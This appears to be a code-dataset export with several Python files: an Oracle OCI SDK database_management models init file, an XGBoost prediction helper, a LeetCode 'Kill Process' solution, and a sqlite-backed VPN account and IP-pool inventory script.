"AwrDbCpuUsageSummary": AwrDbCpuUsageSummary,
"AwrDbMetricCollection": AwrDbMetricCollection,
"AwrDbMetricSummary": AwrDbMetricSummary,
"AwrDbParameterChangeCollection": AwrDbParameterChangeCollection,
"AwrDbParameterChangeSummary": AwrDbParameterChangeSummary,
"AwrDbParameterCollection": AwrDbParameterCollection,
"AwrDbParameterSummary": AwrDbParameterSummary,
"AwrDbReport": AwrDbReport,
"AwrDbSnapshotCollection": AwrDbSnapshotCollection,
"AwrDbSnapshotRangeCollection": AwrDbSnapshotRangeCollection,
"AwrDbSnapshotRangeSummary": AwrDbSnapshotRangeSummary,
"AwrDbSnapshotSummary": AwrDbSnapshotSummary,
"AwrDbSqlReport": AwrDbSqlReport,
"AwrDbSummary": AwrDbSummary,
"AwrDbSysstatCollection": AwrDbSysstatCollection,
"AwrDbSysstatSummary": AwrDbSysstatSummary,
"AwrDbTopWaitEventCollection": AwrDbTopWaitEventCollection,
"AwrDbTopWaitEventSummary": AwrDbTopWaitEventSummary,
"AwrDbWaitEventBucketCollection": AwrDbWaitEventBucketCollection,
"AwrDbWaitEventBucketSummary": AwrDbWaitEventBucketSummary,
"AwrDbWaitEventCollection": AwrDbWaitEventCollection,
"AwrDbWaitEventSummary": AwrDbWaitEventSummary,
"AwrQueryResult": AwrQueryResult,
"ChangeDatabaseParameterDetails": ChangeDatabaseParameterDetails,
"ChangeDatabaseParametersDetails": ChangeDatabaseParametersDetails,
"ChangeDbManagementPrivateEndpointCompartmentDetails": ChangeDbManagementPrivateEndpointCompartmentDetails,
"ChangeJobCompartmentDetails": ChangeJobCompartmentDetails,
"ChangeManagedDatabaseGroupCompartmentDetails": ChangeManagedDatabaseGroupCompartmentDetails,
"ChildDatabase": ChildDatabase,
"ClusterCacheMetric": ClusterCacheMetric,
"CreateDbManagementPrivateEndpointDetails": CreateDbManagementPrivateEndpointDetails,
"CreateJobDetails": CreateJobDetails,
"CreateManagedDatabaseGroupDetails": CreateManagedDatabaseGroupDetails,
"CreateSqlJobDetails": CreateSqlJobDetails,
"DatabaseCredentials": DatabaseCredentials,
"DatabaseFleetHealthMetrics": DatabaseFleetHealthMetrics,
"DatabaseHomeMetricDefinition": DatabaseHomeMetricDefinition,
"DatabaseHomeMetrics": DatabaseHomeMetrics,
"DatabaseIOAggregateMetrics": DatabaseIOAggregateMetrics,
"DatabaseInstanceHomeMetricsDefinition": DatabaseInstanceHomeMetricsDefinition,
"DatabaseParameterSummary": DatabaseParameterSummary,
"DatabaseParameterUpdateStatus": DatabaseParameterUpdateStatus,
"DatabaseParametersCollection": DatabaseParametersCollection,
"DatabaseStorageAggregateMetrics": DatabaseStorageAggregateMetrics,
"DatabaseTimeAggregateMetrics": DatabaseTimeAggregateMetrics,
"DatabaseUsageMetrics": DatabaseUsageMetrics,
"Datafile": Datafile,
"DbManagementPrivateEndpoint": DbManagementPrivateEndpoint,
"DbManagementPrivateEndpointCollection": DbManagementPrivateEndpointCollection,
"DbManagementPrivateEndpointSummary": DbManagementPrivateEndpointSummary,
"FleetMetricDefinition": FleetMetricDefinition,
"FleetMetricSummaryDefinition": FleetMetricSummaryDefinition,
"FleetStatusByCategory": FleetStatusByCategory,
"FleetSummary": FleetSummary,
"InstanceDetails": InstanceDetails,
"Job": Job,
"JobCollection": JobCollection,
"JobDatabase": JobDatabase,
"JobExecution": JobExecution,
"JobExecutionCollection": JobExecutionCollection,
"JobExecutionResultDetails": JobExecutionResultDetails,
"JobExecutionResultLocation": JobExecutionResultLocation,
"JobExecutionSummary": JobExecutionSummary,
"JobExecutionsStatusSummary": JobExecutionsStatusSummary,
"JobExecutionsStatusSummaryCollection": JobExecutionsStatusSummaryCollection,
"JobRun": JobRun,
"JobRunCollection": JobRunCollection,
"JobRunSummary": JobRunSummary,
"JobScheduleDetails": JobScheduleDetails,
"JobSummary": JobSummary,
"ManagedDatabase": ManagedDatabase,
"ManagedDatabaseCollection": ManagedDatabaseCollection,
"ManagedDatabaseGroup": ManagedDatabaseGroup,
"ManagedDatabaseGroupCollection": ManagedDatabaseGroupCollection,
"ManagedDatabaseGroupSummary": ManagedDatabaseGroupSummary,
"ManagedDatabaseSummary": ManagedDatabaseSummary,
"MemoryAggregateMetrics": MemoryAggregateMetrics,
"MetricDataPoint": MetricDataPoint,
"MetricDimensionDefinition": MetricDimensionDefinition,
"ObjectStorageJobExecutionResultDetails": ObjectStorageJobExecutionResultDetails,
"ObjectStorageJobExecutionResultLocation": ObjectStorageJobExecutionResultLocation,
"ParentGroup": ParentGroup,
"PdbMetrics": PdbMetrics,
"PdbStatusDetails": PdbStatusDetails,
"RemoveManagedDatabaseFromManagedDatabaseGroupDetails": RemoveManagedDatabaseFromManagedDatabaseGroupDetails,
"ResetDatabaseParametersDetails": ResetDatabaseParametersDetails,
"SqlJob": SqlJob,
"Tablespace": Tablespace,
"TablespaceCollection": TablespaceCollection,
"TablespaceSummary": TablespaceSummary,
"TimeSeriesMetricDataPoint": TimeSeriesMetricDataPoint,
"TimeSeriesMetricDefinition": TimeSeriesMetricDefinition,
"UpdateDatabaseParametersResult": UpdateDatabaseParametersResult,
"UpdateDbManagementPrivateEndpointDetails": UpdateDbManagementPrivateEndpointDetails,
"UpdateJobDetails": UpdateJobDetails,
"UpdateManagedDatabaseGroupDetails": UpdateManagedDatabaseGroupDetails,
"UpdateSqlJobDetails": UpdateSqlJobDetails,
"WorkRequest": WorkRequest,
"WorkRequestCollection": WorkRequestCollection,
"WorkRequestError": WorkRequestError,
"WorkRequestErrorCollection": WorkRequestErrorCollection,
"WorkRequestLogEntry": WorkRequestLogEntry,
"WorkRequestLogEntryCollection": WorkRequestLogEntryCollection,
"WorkRequestResource": WorkRequestResource,
"WorkRequestSummary": WorkRequestSummary
}
| # coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from __future__ import absolute_import
from .activity_time_series_metrics import ActivityTimeSeriesMetrics
from .add_managed_database_to_managed_database_group_details import AddManagedDatabaseToManagedDatabaseGroupDetails
from .allowed_parameter_value import AllowedParameterValue
from .associated_database_collection import AssociatedDatabaseCollection
from .associated_database_summary import AssociatedDatabaseSummary
from .awr_db_collection import AwrDbCollection
from .awr_db_cpu_usage_collection import AwrDbCpuUsageCollection
from .awr_db_cpu_usage_summary import AwrDbCpuUsageSummary
from .awr_db_metric_collection import AwrDbMetricCollection
from .awr_db_metric_summary import AwrDbMetricSummary
from .awr_db_parameter_change_collection import AwrDbParameterChangeCollection
from .awr_db_parameter_change_summary import AwrDbParameterChangeSummary
from .awr_db_parameter_collection import AwrDbParameterCollection
from .awr_db_parameter_summary import AwrDbParameterSummary
from .awr_db_report import AwrDbReport
from .awr_db_snapshot_collection import AwrDbSnapshotCollection
from .awr_db_snapshot_range_collection import AwrDbSnapshotRangeCollection
from .awr_db_snapshot_range_summary import AwrDbSnapshotRangeSummary
from .awr_db_snapshot_summary import AwrDbSnapshotSummary
from .awr_db_sql_report import AwrDbSqlReport
from .awr_db_summary import AwrDbSummary
from .awr_db_sysstat_collection import AwrDbSysstatCollection
from .awr_db_sysstat_summary import AwrDbSysstatSummary
from .awr_db_top_wait_event_collection import AwrDbTopWaitEventCollection
from .awr_db_top_wait_event_summary import AwrDbTopWaitEventSummary
from .awr_db_wait_event_bucket_collection import AwrDbWaitEventBucketCollection
from .awr_db_wait_event_bucket_summary import AwrDbWaitEventBucketSummary
from .awr_db_wait_event_collection import AwrDbWaitEventCollection
from .awr_db_wait_event_summary import AwrDbWaitEventSummary
from .awr_query_result import AwrQueryResult
from .change_database_parameter_details import ChangeDatabaseParameterDetails
from .change_database_parameters_details import ChangeDatabaseParametersDetails
from .change_db_management_private_endpoint_compartment_details import ChangeDbManagementPrivateEndpointCompartmentDetails
from .change_job_compartment_details import ChangeJobCompartmentDetails
from .change_managed_database_group_compartment_details import ChangeManagedDatabaseGroupCompartmentDetails
from .child_database import ChildDatabase
from .cluster_cache_metric import ClusterCacheMetric
from .create_db_management_private_endpoint_details import CreateDbManagementPrivateEndpointDetails
from .create_job_details import CreateJobDetails
from .create_managed_database_group_details import CreateManagedDatabaseGroupDetails
from .create_sql_job_details import CreateSqlJobDetails
from .database_credentials import DatabaseCredentials
from .database_fleet_health_metrics import DatabaseFleetHealthMetrics
from .database_home_metric_definition import DatabaseHomeMetricDefinition
from .database_home_metrics import DatabaseHomeMetrics
from .database_io_aggregate_metrics import DatabaseIOAggregateMetrics
from .database_instance_home_metrics_definition import DatabaseInstanceHomeMetricsDefinition
from .database_parameter_summary import DatabaseParameterSummary
from .database_parameter_update_status import DatabaseParameterUpdateStatus
from .database_parameters_collection import DatabaseParametersCollection
from .database_storage_aggregate_metrics import DatabaseStorageAggregateMetrics
from .database_time_aggregate_metrics import DatabaseTimeAggregateMetrics
from .database_usage_metrics import DatabaseUsageMetrics
from .datafile import Datafile
from .db_management_private_endpoint import DbManagementPrivateEndpoint
from .db_management_private_endpoint_collection import DbManagementPrivateEndpointCollection
from .db_management_private_endpoint_summary import DbManagementPrivateEndpointSummary
from .fleet_metric_definition import FleetMetricDefinition
from .fleet_metric_summary_definition import FleetMetricSummaryDefinition
from .fleet_status_by_category import FleetStatusByCategory
from .fleet_summary import FleetSummary
from .instance_details import InstanceDetails
from .job import Job
from .job_collection import JobCollection
from .job_database import JobDatabase
from .job_execution import JobExecution
from .job_execution_collection import JobExecutionCollection
from .job_execution_result_details import JobExecutionResultDetails
from .job_execution_result_location import JobExecutionResultLocation
from .job_execution_summary import JobExecutionSummary
from .job_executions_status_summary import JobExecutionsStatusSummary
from .job_executions_status_summary_collection import JobExecutionsStatusSummaryCollection
from .job_run import JobRun
from .job_run_collection import JobRunCollection
from .job_run_summary import JobRunSummary
from .job_schedule_details import JobScheduleDetails
from .job_summary import JobSummary
from .managed_database import ManagedDatabase
from .managed_database_collection import ManagedDatabaseCollection
from .managed_database_group import ManagedDatabaseGroup
from .managed_database_group_collection import ManagedDatabaseGroupCollection
from .managed_database_group_summary import ManagedDatabaseGroupSummary
from .managed_database_summary import ManagedDatabaseSummary
from .memory_aggregate_metrics import MemoryAggregateMetrics
from .metric_data_point import MetricDataPoint
from .metric_dimension_definition import MetricDimensionDefinition
from .object_storage_job_execution_result_details import ObjectStorageJobExecutionResultDetails
from .object_storage_job_execution_result_location import ObjectStorageJobExecutionResultLocation
from .parent_group import ParentGroup
from .pdb_metrics import PdbMetrics
from .pdb_status_details import PdbStatusDetails
from .remove_managed_database_from_managed_database_group_details import RemoveManagedDatabaseFromManagedDatabaseGroupDetails
from .reset_database_parameters_details import ResetDatabaseParametersDetails
from .sql_job import SqlJob
from .tablespace import Tablespace
from .tablespace_collection import TablespaceCollection
from .tablespace_summary import TablespaceSummary
from .time_series_metric_data_point import TimeSeriesMetricDataPoint
from .time_series_metric_definition import TimeSeriesMetricDefinition
from .update_database_parameters_result import UpdateDatabaseParametersResult
from .update_db_management_private_endpoint_details import UpdateDbManagementPrivateEndpointDetails
from .update_job_details import UpdateJobDetails
from .update_managed_database_group_details import UpdateManagedDatabaseGroupDetails
from .update_sql_job_details import UpdateSqlJobDetails
from .work_request import WorkRequest
from .work_request_collection import WorkRequestCollection
from .work_request_error import WorkRequestError
from .work_request_error_collection import WorkRequestErrorCollection
from .work_request_log_entry import WorkRequestLogEntry
from .work_request_log_entry_collection import WorkRequestLogEntryCollection
from .work_request_resource import WorkRequestResource
from .work_request_summary import WorkRequestSummary
# Maps type names to classes for database_management services.
database_management_type_mapping = {
"ActivityTimeSeriesMetrics": ActivityTimeSeriesMetrics,
"AddManagedDatabaseToManagedDatabaseGroupDetails": AddManagedDatabaseToManagedDatabaseGroupDetails,
"AllowedParameterValue": AllowedParameterValue,
"AssociatedDatabaseCollection": AssociatedDatabaseCollection,
"AssociatedDatabaseSummary": AssociatedDatabaseSummary,
"AwrDbCollection": AwrDbCollection,
"AwrDbCpuUsageCollection": AwrDbCpuUsageCollection,
"AwrDbCpuUsageSummary": AwrDbCpuUsageSummary,
"AwrDbMetricCollection": AwrDbMetricCollection,
"AwrDbMetricSummary": AwrDbMetricSummary,
"AwrDbParameterChangeCollection": AwrDbParameterChangeCollection,
"AwrDbParameterChangeSummary": AwrDbParameterChangeSummary,
"AwrDbParameterCollection": AwrDbParameterCollection,
"AwrDbParameterSummary": AwrDbParameterSummary,
"AwrDbReport": AwrDbReport,
"AwrDbSnapshotCollection": AwrDbSnapshotCollection,
"AwrDbSnapshotRangeCollection": AwrDbSnapshotRangeCollection,
"AwrDbSnapshotRangeSummary": AwrDbSnapshotRangeSummary,
"AwrDbSnapshotSummary": AwrDbSnapshotSummary,
"AwrDbSqlReport": AwrDbSqlReport,
"AwrDbSummary": AwrDbSummary,
"AwrDbSysstatCollection": AwrDbSysstatCollection,
"AwrDbSysstatSummary": AwrDbSysstatSummary,
"AwrDbTopWaitEventCollection": AwrDbTopWaitEventCollection,
"AwrDbTopWaitEventSummary": AwrDbTopWaitEventSummary,
"AwrDbWaitEventBucketCollection": AwrDbWaitEventBucketCollection,
"AwrDbWaitEventBucketSummary": AwrDbWaitEventBucketSummary,
"AwrDbWaitEventCollection": AwrDbWaitEventCollection,
"AwrDbWaitEventSummary": AwrDbWaitEventSummary,
"AwrQueryResult": AwrQueryResult,
"ChangeDatabaseParameterDetails": ChangeDatabaseParameterDetails,
"ChangeDatabaseParametersDetails": ChangeDatabaseParametersDetails,
"ChangeDbManagementPrivateEndpointCompartmentDetails": ChangeDbManagementPrivateEndpointCompartmentDetails,
"ChangeJobCompartmentDetails": ChangeJobCompartmentDetails,
"ChangeManagedDatabaseGroupCompartmentDetails": ChangeManagedDatabaseGroupCompartmentDetails,
"ChildDatabase": ChildDatabase,
"ClusterCacheMetric": ClusterCacheMetric,
"CreateDbManagementPrivateEndpointDetails": CreateDbManagementPrivateEndpointDetails,
"CreateJobDetails": CreateJobDetails,
"CreateManagedDatabaseGroupDetails": CreateManagedDatabaseGroupDetails,
"CreateSqlJobDetails": CreateSqlJobDetails,
"DatabaseCredentials": DatabaseCredentials,
"DatabaseFleetHealthMetrics": DatabaseFleetHealthMetrics,
"DatabaseHomeMetricDefinition": DatabaseHomeMetricDefinition,
"DatabaseHomeMetrics": DatabaseHomeMetrics,
"DatabaseIOAggregateMetrics": DatabaseIOAggregateMetrics,
"DatabaseInstanceHomeMetricsDefinition": DatabaseInstanceHomeMetricsDefinition,
"DatabaseParameterSummary": DatabaseParameterSummary,
"DatabaseParameterUpdateStatus": DatabaseParameterUpdateStatus,
"DatabaseParametersCollection": DatabaseParametersCollection,
"DatabaseStorageAggregateMetrics": DatabaseStorageAggregateMetrics,
"DatabaseTimeAggregateMetrics": DatabaseTimeAggregateMetrics,
"DatabaseUsageMetrics": DatabaseUsageMetrics,
"Datafile": Datafile,
"DbManagementPrivateEndpoint": DbManagementPrivateEndpoint,
"DbManagementPrivateEndpointCollection": DbManagementPrivateEndpointCollection,
"DbManagementPrivateEndpointSummary": DbManagementPrivateEndpointSummary,
"FleetMetricDefinition": FleetMetricDefinition,
"FleetMetricSummaryDefinition": FleetMetricSummaryDefinition,
"FleetStatusByCategory": FleetStatusByCategory,
"FleetSummary": FleetSummary,
"InstanceDetails": InstanceDetails,
"Job": Job,
"JobCollection": JobCollection,
"JobDatabase": JobDatabase,
"JobExecution": JobExecution,
"JobExecutionCollection": JobExecutionCollection,
"JobExecutionResultDetails": JobExecutionResultDetails,
"JobExecutionResultLocation": JobExecutionResultLocation,
"JobExecutionSummary": JobExecutionSummary,
"JobExecutionsStatusSummary": JobExecutionsStatusSummary,
"JobExecutionsStatusSummaryCollection": JobExecutionsStatusSummaryCollection,
"JobRun": JobRun,
"JobRunCollection": JobRunCollection,
"JobRunSummary": JobRunSummary,
"JobScheduleDetails": JobScheduleDetails,
"JobSummary": JobSummary,
"ManagedDatabase": ManagedDatabase,
"ManagedDatabaseCollection": ManagedDatabaseCollection,
"ManagedDatabaseGroup": ManagedDatabaseGroup,
"ManagedDatabaseGroupCollection": ManagedDatabaseGroupCollection,
"ManagedDatabaseGroupSummary": ManagedDatabaseGroupSummary,
"ManagedDatabaseSummary": ManagedDatabaseSummary,
"MemoryAggregateMetrics": MemoryAggregateMetrics,
"MetricDataPoint": MetricDataPoint,
"MetricDimensionDefinition": MetricDimensionDefinition,
"ObjectStorageJobExecutionResultDetails": ObjectStorageJobExecutionResultDetails,
"ObjectStorageJobExecutionResultLocation": ObjectStorageJobExecutionResultLocation,
"ParentGroup": ParentGroup,
"PdbMetrics": PdbMetrics,
"PdbStatusDetails": PdbStatusDetails,
"RemoveManagedDatabaseFromManagedDatabaseGroupDetails": RemoveManagedDatabaseFromManagedDatabaseGroupDetails,
"ResetDatabaseParametersDetails": ResetDatabaseParametersDetails,
"SqlJob": SqlJob,
"Tablespace": Tablespace,
"TablespaceCollection": TablespaceCollection,
"TablespaceSummary": TablespaceSummary,
"TimeSeriesMetricDataPoint": TimeSeriesMetricDataPoint,
"TimeSeriesMetricDefinition": TimeSeriesMetricDefinition,
"UpdateDatabaseParametersResult": UpdateDatabaseParametersResult,
"UpdateDbManagementPrivateEndpointDetails": UpdateDbManagementPrivateEndpointDetails,
"UpdateJobDetails": UpdateJobDetails,
"UpdateManagedDatabaseGroupDetails": UpdateManagedDatabaseGroupDetails,
"UpdateSqlJobDetails": UpdateSqlJobDetails,
"WorkRequest": WorkRequest,
"WorkRequestCollection": WorkRequestCollection,
"WorkRequestError": WorkRequestError,
"WorkRequestErrorCollection": WorkRequestErrorCollection,
"WorkRequestLogEntry": WorkRequestLogEntry,
"WorkRequestLogEntryCollection": WorkRequestLogEntryCollection,
"WorkRequestResource": WorkRequestResource,
"WorkRequestSummary": WorkRequestSummary
} | en | 0.853826 | # coding: utf-8 # Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved. # This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license. # Maps type names to classes for database_management services. | 1.025189 | 1 |
all_model.py | RajdeepBorgohain/NextDayProfitGeneration | 0 | 6616661 | <filename>all_model.py
import pickle
import numpy as np
import xgboost
# from xgboost import XGBClassifier
# import xgboost as xgb
"""Input: NULL
Output: Model
"""
def load_model():
load_model = pickle.load(open('model/xgb_f_beta_model.sav','rb'))
return load_model
""" Input: Model, Selected_date Data
Output: Predicted Score
"""
def prediction(model,data):
pred = model.predict_proba(data)
score = np.average(pred[:,1:])
return score | <filename>all_model.py
import pickle
import numpy as np
import xgboost
# from xgboost import XGBClassifier
# import xgboost as xgb
"""Input: NULL
Output: Model
"""
def load_model():
load_model = pickle.load(open('model/xgb_f_beta_model.sav','rb'))
return load_model
""" Input: Model, Selected_date Data
Output: Predicted Score
"""
def prediction(model,data):
pred = model.predict_proba(data)
score = np.average(pred[:,1:])
return score | en | 0.59902 | # from xgboost import XGBClassifier # import xgboost as xgb Input: NULL Output: Model Input: Model, Selected_date Data Output: Predicted Score | 2.776309 | 3 |
problems/582.Kill_Process/li.py | subramp-prep/leetcode | 0 | 6616662 | # coding=utf-8
# Author: <NAME>
# Question: 582.Kill_Process
# Date: 2017-05-17 14:10 - 14:19
# Complexity: O(N)
class Solution(object):
def killProcess(self, pid, ppid, kill):
"""
:type pid: List[int]
:type ppid: List[int]
:type kill: int
:rtype: List[int]
"""
d = {}
for c, p in zip(pid, ppid):
if p not in d:
d[p] = []
d[p].append(c)
bfs = [kill]
for i in bfs:
bfs.extend(d.get(i, []))
return bfs
def killProcess(self, pid, ppid, kill):
d = collections.defaultdict(list)
for c, p in zip(pid, ppid):
d[p].append(c)
bfs = [kill]
for i in bfs:
bfs.extend(d.get(i, []))
return bfs
| # coding=utf-8
# Author: <NAME>
# Question: 582.Kill_Process
# Date: 2017-05-17 14:10 - 14:19
# Complexity: O(N)
class Solution(object):
def killProcess(self, pid, ppid, kill):
"""
:type pid: List[int]
:type ppid: List[int]
:type kill: int
:rtype: List[int]
"""
d = {}
for c, p in zip(pid, ppid):
if p not in d:
d[p] = []
d[p].append(c)
bfs = [kill]
for i in bfs:
bfs.extend(d.get(i, []))
return bfs
def killProcess(self, pid, ppid, kill):
d = collections.defaultdict(list)
for c, p in zip(pid, ppid):
d[p].append(c)
bfs = [kill]
for i in bfs:
bfs.extend(d.get(i, []))
return bfs
| en | 0.525457 | # coding=utf-8 # Author: <NAME> # Question: 582.Kill_Process # Date: 2017-05-17 14:10 - 14:19 # Complexity: O(N) :type pid: List[int] :type ppid: List[int] :type kill: int :rtype: List[int] | 3.228268 | 3 |
vpn_account.py | MalpraveCorp/VPN-Account-Network-Inventory-Manager | 0 | 6616663 | <reponame>MalpraveCorp/VPN-Account-Network-Inventory-Manager<gh_stars>0
#!/usr/bin/env python
# VPN account/network inventory
import argparse
import sqlite3
import json
from signal import signal, SIGPIPE, SIG_DFL
signal(SIGPIPE, SIG_DFL)
DEFAULT_GROUP = 'prod'
DEFAULT_SUBNET = '0'
DEFAULT_NETWORK = '10.10.'
def get_chunks(seq, size):
return (seq[pos:pos + size] for pos in range(0, len(seq), size))
def get_octets(address):
return str(address).split(".")
def printer(rows):
if ARGS["json"]:
print(json.dumps(rows, indent=4))
else:
for row in rows:
print(row)
def dict_factory(cursor, row):
dic = {}
for idx, col in enumerate(cursor.description):
dic[col[0]] = row[idx]
return dic
# def get_ippools_usage(conn):
# return {
# '.0.1': 0.40,
# '.0.4': 0.00
# }
def get_arguments():
parser = argparse.ArgumentParser(description='VPN account/network inventory.')
# User Actions
parser.add_argument('--create-account', help='Create a new VPN account.')
parser.add_argument('--create-account-hardcoded', help='Create a new VPN account with pre defined parameters.', nargs='*')
parser.add_argument('--revoke-account', help='Revoke an existing VPN account.')
# parser.add_argument('--modify', help='Modify an existing VPN account, e.g. move to another group or change details.')
# parser.add_argument('--password-reset', help='Reset a VPN account password.')
# Pool Actions
parser.add_argument('--create-pool', help='Create a new IP pool with provided subnet.', nargs='*')
# Usage View
parser.add_argument('--show-accounts', help='Shows accounts.', action='store_true')
parser.add_argument('--show-accounts-full', help='Shows accounts with respective IP pool info.', action='store_true')
parser.add_argument('--show-pools', help='Shows IP Pools.', action='store_true')
parser.add_argument('--show-pool-usage', help='Shows IP Pool usage.', action='store_true')
parser.add_argument('--show-subnet-usage', help='Shows subnet usage.', action='store_true')
# View format
parser.add_argument('--json', help='Prints data in JSON format.', action='store_true')
parsed_args = parser.parse_args()
# parser.print_help()
return vars(parsed_args)
def get_pools(subnet, name):
""" Generates list of IP pairs on a /20 available for the given subnet."""
subnet = int(subnet)
ret = []
for third_octete in range(subnet, subnet+16):
# each client needs 4 ips - must be divisible by 4
for forth_octete in get_chunks(range(1, 253), 4):
# Allows for 0.0/20 0.16/20 0.32/20
network = DEFAULT_NETWORK + str(third_octete)
ret.append([network + '.0', name, forth_octete[0], forth_octete[1], network + '.255', 0])
return ret
def get_accounts():
""" Get all user accounts """
sql = 'SELECT * FROM accounts'
CUR.execute(sql)
return CUR.fetchall()
def get_accounts_full():
""" Get all user accounts along with respective ip addresses assigned """
sql = 'SELECT * FROM accounts LEFT JOIN ippools on accounts.ippool_id = ippools.id'
CUR.execute(sql)
return CUR.fetchall()
def get_ippools():
""" Get all IP pools"""
sql = 'SELECT * FROM ippools'
CUR.execute(sql)
return CUR.fetchall()
def get_database():
""" Return instance of database connection"""
connection = sqlite3.connect('vpnaccount.db')
connection.row_factory = dict_factory
return connection
def create_tables():
""" Initialize database with new tables """
sql = """CREATE TABLE IF NOT EXISTS accounts
(id INTEGER PRIMARY KEY AUTOINCREMENT,
username VARCHAR(100) NOT NULL,
email VARCHAR(100) NOT NULL,
status INTEGER,
ippool_id INTEGER,
CONSTRAINT username_unique UNIQUE (username)
)"""
CONN.cursor().execute(sql)
sql = """CREATE TABLE IF NOT EXISTS ippools
(id INTEGER PRIMARY KEY AUTOINCREMENT,
network VARCHAR(100) NOT NULL,
subnet VARCHAR(100) NOT NULL,
first_ip VARCHAR(100) NOT NULL,
last_ip VARCHAR(100) NOT NULL,
broadcast VARCHAR(100) NOT NULL,
status INTEGER,
CONSTRAINT network_address UNIQUE (network, first_ip, last_ip)
)"""
CONN.cursor().execute(sql)
CONN.commit()
def get_available_ip():
""" Returns the first IP pair available """
cur = CONN.cursor()
cur.execute('SELECT * FROM ippools WHERE status = 0')
return cur.fetchone()
def get_ippool_id(first_ip, last_ip, network, subnet):
""" Returns IP pool id for given input parameters"""
cur = CONN.cursor()
cur.execute('SELECT * FROM ippools WHERE network = ? AND first_ip = ? AND last_ip = ? and subnet LIKE ?', [network, first_ip, last_ip, subnet])
return cur.fetchone()
def create_ippools(subnet=DEFAULT_SUBNET, name=DEFAULT_GROUP):
""" Populates IP pools database """
CONN.cursor().executemany('INSERT INTO ippools(network, subnet, first_ip, last_ip, broadcast, status) VALUES (?,?,?,?,?,?)', get_pools(subnet, name))
CONN.commit()
def create_user(email):
""" Create a new user and assign it an IP pair """
ip_address_id = get_available_ip()['id']
CONN.cursor().execute('UPDATE ippools SET status = 1 WHERE id = ?', (ip_address_id,))
CONN.cursor().execute('INSERT INTO accounts(username, email, status, ippool_id) VALUES (?,?,?,?)', [email, email, 1, ip_address_id])
CONN.commit()
def create_user_hardcoded(email, first_ip, last_ip, subnet):
""" Create a new user from existing system, preserving ip pairs """
network = DEFAULT_NETWORK + get_octets(first_ip)[2] + '.0'
first_ip = get_octets(first_ip)[3]
last_ip = get_octets(last_ip)[3]
print(first_ip, last_ip, network, subnet)
ip_address_id = get_ippool_id(first_ip, last_ip, network, subnet)['id']
CONN.cursor().execute('UPDATE ippools SET status = 1 WHERE id = ?', (ip_address_id,))
CONN.cursor().execute('INSERT INTO accounts(username, email, status, ippool_id) VALUES (?,?,?,?)', [email, email, 1, ip_address_id])
CONN.commit()
def revoke_user(email):
""" Disable user and free its IP pair """
cur = CONN.cursor()
cur.execute('SELECT * FROM accounts WHERE username LIKE ?', (email,))
account = cur.fetchone()
cur.execute('UPDATE accounts SET status = 0 WHERE id = ?', (int(account['id']), )) # also remove ippool_id?
cur.execute('UPDATE ippools SET status = 0 WHERE id = ?', (int(account['ippool_id']), ))
CONN.commit()
def handler_create_pool(arguments):
if len(arguments) == 2:
print('Creating subnet with provided name and range.')
create_ippools(arguments[0], arguments[1])
elif len(arguments) == 1:
print('You should provide no arguments for defaults or subnet and group name e.g. --create-pool 16 prod')
else:
print('Creating default subnet.')
create_ippools()
def handler_create_user_hardcoded(arguments):
if len(arguments) != 4:
print('You need to specify 4 params: EMAIL FISTIP LASTIP SUBNET')
return
email = arguments[0]
first_ip = arguments[1]
last_ip = arguments[2]
subnet = arguments[3]
create_user_hardcoded(email, first_ip, last_ip, subnet)
#
# main
#
CONN = get_database()
# if not database_initialized:
create_tables()
CUR = CONN.cursor()
ARGS = get_arguments()
if ARGS["show_accounts"]:
printer(get_accounts())
if ARGS["show_accounts_full"]:
printer(get_accounts_full())
if ARGS["show_pools"]:
printer(get_ippools())
if ARGS["create_account"] is not None:
create_user(ARGS["create_account"])
if ARGS["create_account_hardcoded"] is not None:
handler_create_user_hardcoded(ARGS["create_account_hardcoded"])
if ARGS["revoke_account"] is not None:
revoke_user(ARGS["revoke_account"])
if ARGS["create_pool"] is not None:
handler_create_pool(ARGS["create_pool"])
CONN.close()
| #!/usr/bin/env python
# VPN account/network inventory
import argparse
import sqlite3
import json
from signal import signal, SIGPIPE, SIG_DFL
signal(SIGPIPE, SIG_DFL)
DEFAULT_GROUP = 'prod'
DEFAULT_SUBNET = '0'
DEFAULT_NETWORK = '10.10.'
def get_chunks(seq, size):
return (seq[pos:pos + size] for pos in range(0, len(seq), size))
def get_octets(address):
return str(address).split(".")
def printer(rows):
if ARGS["json"]:
print(json.dumps(rows, indent=4))
else:
for row in rows:
print(row)
def dict_factory(cursor, row):
dic = {}
for idx, col in enumerate(cursor.description):
dic[col[0]] = row[idx]
return dic
# def get_ippools_usage(conn):
# return {
# '.0.1': 0.40,
# '.0.4': 0.00
# }
def get_arguments():
parser = argparse.ArgumentParser(description='VPN account/network inventory.')
# User Actions
parser.add_argument('--create-account', help='Create a new VPN account.')
parser.add_argument('--create-account-hardcoded', help='Create a new VPN account with pre defined parameters.', nargs='*')
parser.add_argument('--revoke-account', help='Revoke an existing VPN account.')
# parser.add_argument('--modify', help='Modify an existing VPN account, e.g. move to another group or change details.')
# parser.add_argument('--password-reset', help='Reset a VPN account password.')
# Pool Actions
parser.add_argument('--create-pool', help='Create a new IP pool with provided subnet.', nargs='*')
# Usage View
parser.add_argument('--show-accounts', help='Shows accounts.', action='store_true')
parser.add_argument('--show-accounts-full', help='Shows accounts with respective IP pool info.', action='store_true')
parser.add_argument('--show-pools', help='Shows IP Pools.', action='store_true')
parser.add_argument('--show-pool-usage', help='Shows IP Pool usage.', action='store_true')
parser.add_argument('--show-subnet-usage', help='Shows subnet usage.', action='store_true')
# View format
parser.add_argument('--json', help='Prints data in JSON format.', action='store_true')
parsed_args = parser.parse_args()
# parser.print_help()
return vars(parsed_args)
def get_pools(subnet, name):
""" Generates list of IP pairs on a /20 available for the given subnet."""
subnet = int(subnet)
ret = []
for third_octete in range(subnet, subnet+16):
# each client needs 4 ips - must be divisible by 4
for forth_octete in get_chunks(range(1, 253), 4):
# Allows for 0.0/20 0.16/20 0.32/20
network = DEFAULT_NETWORK + str(third_octete)
ret.append([network + '.0', name, forth_octete[0], forth_octete[1], network + '.255', 0])
return ret
def get_accounts():
""" Get all user accounts """
